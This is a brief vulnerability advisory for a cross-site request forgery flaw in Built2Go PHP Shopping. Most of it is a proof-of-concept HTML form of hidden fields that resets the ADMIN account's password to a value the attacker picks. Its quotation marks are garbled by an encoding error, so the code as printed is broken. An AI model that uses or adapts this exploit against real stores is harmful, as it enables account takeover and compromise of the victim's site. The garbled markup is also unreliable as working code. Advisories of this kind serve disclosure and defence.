Built2Go PHP Shopping is prone to a cross-site request-forgery vulnerability.
Exploiting the issue will allow a remote attacker to use a victim's currently active session to change the victim's password. Successful exploits will compromise affected computers.
<form method=â?POSTâ? name=â?form0? action=â?â?>
<input type=â?hiddenâ? name=â?useridâ? value=â?ADMINâ?/>
<input type=â?hiddenâ? name=â?passâ? value=â?12121212?/>
<input type=â?hiddenâ? name=â?retypepassâ? value=â?12121212?/>
<input type=â?hiddenâ? name=â?addnewâ? value=â?1?/>
<input type=â?hiddenâ? name=â?actionâ? value=â?saveâ?/>
<input type=â?hiddenâ? name=â?newâ? value=â?Submitâ?/>